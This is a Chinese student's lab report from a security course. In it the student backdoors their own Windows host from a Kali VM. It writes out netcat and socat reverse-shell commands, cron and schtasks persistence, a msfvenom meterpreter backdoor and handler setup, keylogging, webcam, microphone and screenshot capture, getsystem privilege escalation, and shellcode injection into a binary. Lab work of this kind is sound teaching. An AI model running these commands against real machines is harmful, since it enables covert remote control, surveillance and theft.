1.实验内容
1.使用netcat进行虚拟机和主机的连接,cron启动周期性定时任务。
2.使用socat让虚拟机操作主机, 并调用提前准备的程序,启动任务计划。
3.使用MSF meterpreter(或其他软件)生成后门程序,利用ncat传送到主机让主机运行后门程序,虚拟机获取主机shell。
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
5.使用MSF生成shellcode,注入到实践1中的pwn2中,获取反弹连接Shell。
2.实验过程
1.使用netcat获取主机操作Shell,cron启动某项任务
(1)查看主机的ip
Win+R后输入cmd进入命令行界面后输入ipconfig
(2)使用netcat进行连接并获取shell
下载nacat(之前信息安全概论课程中已经下载过)。
打开虚拟机进入终端,使用root权限,同时主机命令行界面进入ncat所在的目录。
在win命令行界面输入命令:ncat.exe -l -p 8888(l表示listen;p表示port)
虚机终端输入指令:nc 192.168.3.7 8402 -e /bin/sh(nc即netcat,后面的参数是要连接的ip和port,-e是指定连接后运行的程序,本例中就是shell。)
win命令行输入ls,正常显示虚拟机下文件名,证明主机已成功获取虚拟机shell。
(3)通过设置cron使得kali启动定时任务。
cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。
在虚拟机的root账户中,输入crontab -e (执行文字编辑器来设定时程表),选择的是2:/usr/bin/vim.basic;
输入后进入文字编辑器,输入指令23 * * * * /bin/netcat 192.168.3.160 8888 -e /bin/sh (输入自己主机的IP地址,在每小时的第23分钟启动任务)编辑好后退出文字编辑器,输入crontab -l查看时程表:
同时在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件。
现在回到Windows命令行进行操作,切换到root模式,输入:
echo "* * * * * echo "20222315" > /home/liuxinyu20222315/2315.txt" > /var/spool/cron/crontabs/root(每分钟定时执行一次,用“20222315”覆盖文件2315.txt)
crontab -l (检查时程表)
进入Linux虚拟机进入对应路径检查2315.txt文件,发现修改成功。
2.使用socat获取主机操作Shell,任务计划启动
Socat与netcat类似,但比起netcat,socat功能更多,比如如建立ssl连接。
windows主机:下载socat,cmd进入socat文件夹,输入命令:
socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口8888,并把cmd.exe的stderr重定向到stdout)
Linux虚拟机:进入root用户,输入命令:
socat - tcp:192.168.3.160:8888
回到主机,我们需要事先准备一个程序以供运行,文件名为lxy.c,.exe文件位于bin/debug中
在Linux上启用Windows的程序,通过命令行创建任务计划,在shell里输入命令:
schtasks /create /sc minute /mo 1 /tn "20222315lxy" /tr D:\program_code\bin\debug\lxy_2.exe(每一分钟执行一次这个程序):
回到windows主机,打开计算机管理,成功看到正在运行的任务名“20222315lxy”。
3.在Linux下使用MSF meterpreter生成可执行文件,利用ncat或socat传送到Windows主机并运行获取主机shell
保证windows的实时保护处于关闭状态,同时关闭防火墙和杀毒软件进行实验。
(1)生成后门文件
首先在kali终端中输入ifconfig,获得虚拟机的IP地址:
虚拟机的IP地址是192.168.3.176
继续中输入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.176 LPORT=8888 -f exe > 2315backdoor.exe(使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload,并将其保存到一个可执行文件中。)
LHOST=192.168.3.176是shell 连接的主机 IP 地址,即虚拟机的IP地址;
LPORT=8888是攻击者的系统上监听的端口号;
-f exe指定了生成的 payload 的格式,这里是exe;
2315backdoor.exe即生成的恶意可执行文件
(2)将后门文件传输至目标主机(这一步其实也能用共享文件夹实现)
主机进入ncat所在目录下,输入指令:
ncat.exe -lv 8888 > "C:\Users\86132\Desktop\2315backdoor.exe"(监听8888窗口等待接收可执行文件2315backdoor.exe,并将2315backdoor.exe文件存放在桌面上)
虚拟机上输入指令:
nc 192.168.3.176 8888 < 2315backdoor.exe(将生成的后门文件2315backdoor.exe传给主机)。此时如果没有关闭防火墙或杀毒软件就会立即删除该后门程序。
生成的后门程序信息见下图
(3)配置监听模块
回到虚拟机,在Kali终端输入命令msfconsole,然后对监听模块进行配置:
use exploit/multi/handler(使用监听模块,设置payload)
set payload windows/meterpreter/reverse_tcp (使用和生成后门程序时相同的payload)
set LHOST 172.20.10.2 (攻击机的IP地址,和生成后门程序时指定的IP相同)(另此时电脑转移位置,ip地址发生改变)
set LPORT 8888(监听的端口)
接着输入exploit,使监听模块开始运行,并在Windows终端运行后门2315backdoor.exe文件
返回检查虚拟机,输入ls查看windows主机目录,确认已经连接。
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)获取目标主机音频、截屏、摄像头、键盘记录
在exploit模块中继续输入以下命令:
record_mic (音频)
screenshot (截屏)
webcam_snap (拍照)//本人电脑提前禁用了该权限
keyscan_start (开始读取键盘记录)
keyscan_dump (读取键盘记录结束)
刚刚的操作信息已经存取到虚拟机中
(2)提权
确保windows的cmd指令是使用管理员身份运行的,继续在exploit模块中继续输入:
getuid (查看当前用户)
getsystem (提权指令)
5.使用MSF生成shellcode,注入到实验1中的pwn2中,获取反弹连接Shell
在kali命令行下输入:
Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.2
LPORT=8888-x /home/liuxinyu20222315/Desktop/pwn2 -f elf > 2315_pwn
(使用了msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload,并将其注入到指定的可执行文件中,然后将结果输出到一个名为 2315_pwn的文件中。)
-p linux/x86/meterpreter/reverse_tcp:指定要生成的 payload 类型。
LHOST=192.168.3.174:目标主机 IP 地址为 192.168.3.174,这里即虚拟机IP地址。
LPORT=8888:设置 Meterpreter shell 使用的本地端口号为 8888。
-x /home/kali/Desktop/pwn2:指定一个可执行文件作为模板,生成的 payload 将会注入到该文件中。
-f elf:指定输出文件的格式为 ELF 格式,适用于 Linux 系统的可执行文件格式。
使用chmod对生成的2315_pwn文件赋权,输入指令msfconsole,重现监听过程:
打开另一个shell,运行生成的2315_pwn文件
回到第一个shell,输入getuid确认第二个Shell的用户名,成功实现远程控制shell
实验问题及解决方案
问题1:用win主机连接虚拟机后,ls命令没有显示任何文件
解决方案: 用cd命令切换到对应目录,ls成功列出文件。
问题2:生成后门文件后,退出连接,后门文件立即被删除
解决方案:将杀毒软件关掉后,后门程序可以保存。
实验体会
经过此次实验,我了解到虚拟机和主机可以互相连接,在实验过程中,我对ncat、socat等软件也有了基本的了解,同时也为通过后门程序可以直接控制我主机的各个系统和程序感到十分惊讶,这也激发了我对这门课程的学习兴趣。
更重要的是,在此次实验中,我深刻地感受到网络安全的重要性,通过后门程序可以直接控制主机,让我对网络上的不明链接和不安全网站加强了警惕性,同时也提醒自己不要随便使用捡来的u盘,这次实验让我收益良多。